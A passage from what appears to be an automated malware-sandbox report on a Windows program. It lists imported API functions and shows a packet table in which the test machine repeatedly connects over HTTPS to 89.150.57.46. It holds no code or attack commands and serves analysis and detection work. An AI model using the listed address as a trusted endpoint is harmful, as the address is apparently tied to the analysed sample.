SetWindowLongPtrW, GetWindowLongPtrW, EqualRect, CopyRect, MapWindowPoints, ScreenToClient, AdjustWindowRectEx, GetClientRect, RemovePropW, PostQuitMessage, GetPropW, SetPropW, ShowScrollBar, GetScrollRange, SetScrollRange, IsChild, ScrollWindow, DrawTextW
                                                                          ole32.dllIsAccelerator, CoCreateInstance, OleTranslateAccelerator, OleDestroyMenuDescriptor, OleCreateMenuDescriptor, OleLockRunning, RevokeDragDrop, RegisterDragDrop, CoLockObjectExternal, OleGetClipboard, DoDragDrop, CreateStreamOnHGlobal, CoInitialize, CoDisconnectObject, ReleaseStgMedium, OleDuplicateData, CoTaskMemFree, CoTaskMemAlloc, CoUninitialize, CoInitializeEx, OleRun
                                                                          OLEAUT32.dllVariantChangeType, SysAllocString, SysFreeString, SysAllocStringLen, VariantCopy, VarBstrFromDate, VariantInit, SysStringLen, SystemTimeToVariantTime, VariantTimeToSystemTime, GetErrorInfo, LoadTypeLib, VariantClear
                                                                          MSIMG32.dllAlphaBlend, TransparentBlt
                                                                          SHLWAPI.dllPathIsUNCW, PathStripToRootW, PathRemoveFileSpecW, StrFormatKBSizeW, PathFindExtensionW, PathFileExistsW, PathFindFileNameW
                                                                          UxTheme.dllGetThemeColor, IsAppThemed, GetThemePartSize, GetThemeSysColor, DrawThemeText, DrawThemeParentBackground, OpenThemeData, CloseThemeData, DrawThemeBackground, GetWindowTheme, GetCurrentThemeName, IsThemeBackgroundPartiallyTransparent
                                                                          OLEACC.dllLresultFromObject, AccessibleObjectFromWindow, CreateStdAccessibleObject
                                                                          gdiplus.dllGdipDisposeImage, GdipGetImageWidth, GdiplusStartup, GdipFree, GdipAlloc, GdiplusShutdown, GdipGetImageHeight, GdipGetImagePixelFormat, GdipGetImagePalette, GdipGetImagePaletteSize, GdipCreateBitmapFromStream, GdipCreateBitmapFromScan0, GdipBitmapLockBits, GdipBitmapUnlockBits, GdipDeleteGraphics, GdipDrawImageI, GdipGetImageGraphicsContext, GdipCreateBitmapFromHBITMAP, GdipCreateFromHDC, GdipCloneImage, GdipDrawImageRectI, GdipSetInterpolationMode
                                                                          IMM32.dllImmReleaseContext, ImmGetOpenStatus, ImmGetContext
                                                                          WINMM.dllPlaySoundW
                                                                          GDI32.dllGetViewportExtEx, GetObjectType, IntersectClipRect, LineTo, GetStockObject, GetPixel, GetClipBox, ExcludeClipRect, Escape, DeleteDC, CreateSolidBrush, CreateRectRgn, CreatePatternBrush, CreatePen, CreateHatchBrush, CreateCompatibleDC, BitBlt, CreateBitmap, GetObjectW, SetTextColor, SetBkColor, DeleteObject, GetDeviceCaps, GetWindowExtEx, CopyMetaFileW, GetTextFaceW, GetViewportOrgEx, GetWindowOrgEx, SetPixelV, SetPaletteEntries, ExtFloodFill, PtInRegion, GetBoundsRect, FrameRgn, FillRgn, RoundRect, OffsetRgn, GetRgnBox, Rectangle, LPtoDP, CreateRoundRectRgn, Polyline, Polygon, CreatePolygonRgn, GetTextColor, Ellipse, CreateEllipticRgn, SetDIBColorTable, CreateDIBSection, StretchBlt, SetPixel, PtVisible, RectVisible, RestoreDC, GetTextCharsetInfo, SaveDC, SelectClipRgn, ExtSelectClipRgn, SelectObject, SelectPalette, SetBkMode, SetMapMode, SetLayout, GetLayout, SetPolyFillMode, SetROP2, SetTextAlign, MoveToEx, TextOutW, ExtTextOutW, SetViewportExtEx, SetViewportOrgEx, SetWindowExtEx, SetWindowOrgEx, OffsetViewportOrgEx, OffsetWindowOrgEx, ScaleViewportExtEx, ScaleWindowExtEx, CreateFontIndirectW, GetTextExtentPoint32W, CombineRgn, CreateRectRgnIndirect, PatBlt, SetRectRgn, DPtoLP, GetTextMetricsW, EnumFontFamiliesExW, CreatePalette, GetNearestPaletteIndex, GetPaletteEntries, GetSystemPaletteEntries, RealizePalette, GetBkColor, CreateCompatibleBitmap, CreateDIBitmap, EnumFontFamiliesW, CreateDCW
                                                                          WINSPOOL.DRVDocumentPropertiesW, OpenPrinterW, ClosePrinter
                                                                          ADVAPI32.dllRegCloseKey, RegCreateKeyExW, RegDeleteKeyW, RegOpenKeyExW, RegQueryValueExW, RegDeleteValueW, RegEnumKeyExW, RegSetValueExW, AddAccessAllowedAce, AllocateAndInitializeSid, FreeSid, GetLengthSid, InitializeAcl, InitializeSecurityDescriptor, MakeSelfRelativeSD, SetSecurityDescriptorDacl
                                                                          SHELL32.dllSHAppBarMessage, SHBrowseForFolderW, DragFinish, DragQueryFileW, SHGetFileInfoW, ShellExecuteW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetSpecialFolderLocation

                                                                          Possible Origin

                                                                          Language of compilation systemCountry where language is spokenMap
                                                                          EnglishUnited States

                                                                          Network Behavior

                                                                          Network Port Distribution

                                                                          TCP Packets

                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Apr 19, 2024 15:30:59.148650885 CEST49699443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:30:59.148693085 CEST4434969989.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:30:59.148783922 CEST49699443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:30:59.160490036 CEST49699443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:30:59.160507917 CEST4434969989.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:30:59.799844980 CEST4434969989.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:30:59.799927950 CEST49699443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:30:59.849994898 CEST49699443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:30:59.850018978 CEST4434969989.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:30:59.851016045 CEST4434969989.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:30:59.851084948 CEST49699443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:30:59.852926016 CEST49699443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:30:59.896123886 CEST4434969989.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:00.203063011 CEST4434969989.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:00.203196049 CEST4434969989.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:00.203310013 CEST49699443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:00.203401089 CEST49699443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:00.203785896 CEST49699443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:00.203810930 CEST4434969989.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:02.121978998 CEST49700443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:02.122024059 CEST4434970089.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:02.122307062 CEST49700443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:02.122473001 CEST49700443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:02.122484922 CEST4434970089.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:02.741230965 CEST4434970089.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:02.741327047 CEST49700443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:02.741808891 CEST49700443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:02.741817951 CEST4434970089.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:02.743102074 CEST49700443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:02.743107080 CEST4434970089.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:03.147733927 CEST4434970089.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:03.147802114 CEST49700443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:03.147861958 CEST4434970089.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:03.147905111 CEST49700443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:03.147914886 CEST4434970089.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:03.147954941 CEST4434970089.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:03.147957087 CEST49700443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:03.147999048 CEST49700443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:03.148288012 CEST49700443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:03.148307085 CEST4434970089.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:05.086035013 CEST49701443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:05.086138964 CEST4434970189.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:05.086236954 CEST49701443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:05.086677074 CEST49701443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:05.086710930 CEST4434970189.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:05.704444885 CEST4434970189.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:05.704709053 CEST49701443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:05.705590010 CEST49701443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:05.705617905 CEST4434970189.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:05.707075119 CEST49701443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:05.707088947 CEST4434970189.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:06.112349033 CEST4434970189.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:06.112646103 CEST4434970189.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:06.112802982 CEST49701443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:06.113181114 CEST49701443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:06.113226891 CEST4434970189.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:08.070697069 CEST49702443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:08.070739985 CEST4434970289.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:08.070825100 CEST49702443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:08.071192026 CEST49702443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:08.071206093 CEST4434970289.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:08.700910091 CEST4434970289.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:08.701098919 CEST49702443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:08.701695919 CEST49702443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:08.701715946 CEST4434970289.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:08.703248024 CEST49702443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:08.703253031 CEST4434970289.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:09.116118908 CEST4434970289.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:09.116193056 CEST49702443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:09.116328001 CEST4434970289.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:09.116416931 CEST49702443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:09.116429090 CEST4434970289.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:09.116463900 CEST4434970289.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:09.116476059 CEST49702443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:09.116523981 CEST49702443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:09.116873026 CEST49702443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:09.116890907 CEST4434970289.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:11.163367987 CEST49703443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:11.163408995 CEST4434970389.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:11.163482904 CEST49703443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:11.164134979 CEST49703443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:11.164145947 CEST4434970389.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:11.780147076 CEST4434970389.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:11.782042980 CEST49703443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:11.782763004 CEST49703443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:11.782772064 CEST4434970389.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:11.784445047 CEST49703443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:11.784450054 CEST4434970389.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:12.188647985 CEST4434970389.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:12.188956976 CEST4434970389.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:12.189188004 CEST49703443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:12.234337091 CEST49703443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:12.234368086 CEST4434970389.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:14.475780010 CEST49704443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:14.475812912 CEST4434970489.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:14.475871086 CEST49704443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:14.479183912 CEST49704443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:14.479209900 CEST4434970489.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:15.106241941 CEST4434970489.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:15.106312990 CEST49704443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:15.106811047 CEST49704443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:15.106818914 CEST4434970489.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:15.108186007 CEST49704443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:15.108190060 CEST4434970489.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:15.522799015 CEST4434970489.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:15.522866011 CEST49704443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:15.522888899 CEST4434970489.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:15.522933006 CEST49704443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:15.522938967 CEST4434970489.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:15.522972107 CEST4434970489.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:15.522975922 CEST49704443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:15.523010015 CEST49704443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:15.523540974 CEST49704443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:15.523555040 CEST4434970489.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:17.477154970 CEST49713443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:17.477186918 CEST4434971389.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:17.477473021 CEST49713443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:17.480671883 CEST49713443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:17.480683088 CEST4434971389.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:18.094208002 CEST4434971389.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:18.094326973 CEST49713443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:18.095113039 CEST49713443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:18.095123053 CEST4434971389.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:18.104336023 CEST49713443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:18.104348898 CEST4434971389.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:18.502471924 CEST4434971389.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:18.502552032 CEST49713443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:18.502567053 CEST4434971389.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:18.502634048 CEST4434971389.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:18.502661943 CEST49713443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:18.502748966 CEST49713443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:18.522366047 CEST49713443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:18.522382975 CEST4434971389.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:20.467247009 CEST49714443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:20.467284918 CEST4434971489.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:20.467391968 CEST49714443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:20.467710018 CEST49714443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:20.467721939 CEST4434971489.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:21.078707933 CEST4434971489.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:21.078772068 CEST49714443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:21.079746008 CEST49714443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:21.079754114 CEST4434971489.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:21.081568956 CEST49714443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:21.081573963 CEST4434971489.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:21.485718966 CEST4434971489.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:21.485830069 CEST49714443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:21.485831976 CEST4434971489.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:21.485944033 CEST49714443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:21.486954927 CEST49714443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:21.486968994 CEST4434971489.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:23.433077097 CEST49715443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:23.433109999 CEST4434971589.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:23.433284998 CEST49715443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:23.433631897 CEST49715443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:23.433644056 CEST4434971589.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:24.054799080 CEST4434971589.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:24.054903030 CEST49715443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:24.057507038 CEST49715443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:24.057518959 CEST4434971589.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:24.061714888 CEST49715443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:24.061722040 CEST4434971589.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:24.468878984 CEST4434971589.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:24.468945026 CEST49715443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:24.468998909 CEST4434971589.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:24.469036102 CEST49715443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:24.469059944 CEST4434971589.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:24.469072104 CEST4434971589.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:24.469098091 CEST49715443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:24.469131947 CEST49715443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:24.469405890 CEST49715443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:24.469428062 CEST4434971589.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:26.399245977 CEST49716443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:26.399312019 CEST4434971689.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:26.399416924 CEST49716443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:26.399903059 CEST49716443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:26.399940014 CEST4434971689.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:27.015352011 CEST4434971689.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:27.015604019 CEST49716443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:27.015966892 CEST49716443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:27.015980959 CEST4434971689.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:27.017416954 CEST49716443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:27.017426968 CEST4434971689.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:27.422363043 CEST4434971689.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:27.422720909 CEST4434971689.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:27.422801971 CEST49716443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:27.423295021 CEST49716443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:27.423316002 CEST4434971689.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:29.427974939 CEST49717443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:29.428011894 CEST4434971789.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:29.428257942 CEST49717443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:29.428721905 CEST49717443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:29.428734064 CEST4434971789.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:30.045013905 CEST4434971789.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:30.045114040 CEST49717443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:30.046247005 CEST49717443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:30.046272993 CEST4434971789.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:30.048870087 CEST49717443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:30.048882961 CEST4434971789.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:30.451477051 CEST4434971789.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:30.451663971 CEST4434971789.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:30.451760054 CEST49717443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:30.579319000 CEST49717443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:30.579354048 CEST4434971789.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:33.817806005 CEST49718443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:33.817847967 CEST4434971889.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:33.817940950 CEST49718443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:33.818568945 CEST49718443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:33.818598032 CEST4434971889.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:34.435663939 CEST4434971889.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:34.436024904 CEST49718443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:34.436491966 CEST49718443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:34.436505079 CEST4434971889.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:34.437891006 CEST49718443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:34.437896967 CEST4434971889.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:34.842950106 CEST4434971889.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:34.843091965 CEST49718443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:34.843133926 CEST4434971889.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:34.843199015 CEST49718443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:34.843216896 CEST4434971889.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:34.843266964 CEST49718443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:34.843272924 CEST4434971889.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:34.843329906 CEST49718443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:34.843564034 CEST49718443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:34.843581915 CEST4434971889.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:36.770405054 CEST49719443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:36.770479918 CEST4434971989.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:36.773403883 CEST49719443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:36.773751974 CEST49719443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:36.773787022 CEST4434971989.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:37.399153948 CEST4434971989.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:37.399259090 CEST49719443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:37.399836063 CEST49719443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:37.399863005 CEST4434971989.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:37.401452065 CEST49719443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:37.401465893 CEST4434971989.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:37.816653013 CEST4434971989.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:37.816793919 CEST49719443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:37.818249941 CEST4434971989.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:37.818316936 CEST49719443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:37.818337917 CEST4434971989.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:37.818361998 CEST4434971989.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:37.818408966 CEST49719443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:37.818499088 CEST49719443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:37.818572044 CEST49719443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:37.818608046 CEST4434971989.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:37.818635941 CEST49719443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:37.818686008 CEST49719443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:39.756705999 CEST49720443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:39.756733894 CEST4434972089.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:39.756907940 CEST49720443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:39.757302046 CEST49720443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:39.757316113 CEST4434972089.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:40.380568981 CEST4434972089.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:40.382889032 CEST49720443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:40.383382082 CEST49720443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:40.383392096 CEST4434972089.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:40.384851933 CEST49720443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:40.384857893 CEST4434972089.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:40.797818899 CEST4434972089.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:40.797930956 CEST49720443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:40.797941923 CEST4434972089.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:40.797951937 CEST4434972089.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:40.797991991 CEST49720443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:40.798022032 CEST49720443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:40.798422098 CEST49720443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:40.798443079 CEST4434972089.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:42.739157915 CEST49721443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:42.739203930 CEST4434972189.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:42.739350080 CEST49721443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:42.739634037 CEST49721443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:42.739643097 CEST4434972189.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:43.365936995 CEST4434972189.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:43.366028070 CEST49721443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:43.366780043 CEST49721443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:43.366795063 CEST4434972189.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:43.368504047 CEST49721443192.168.2.689.150.57.46
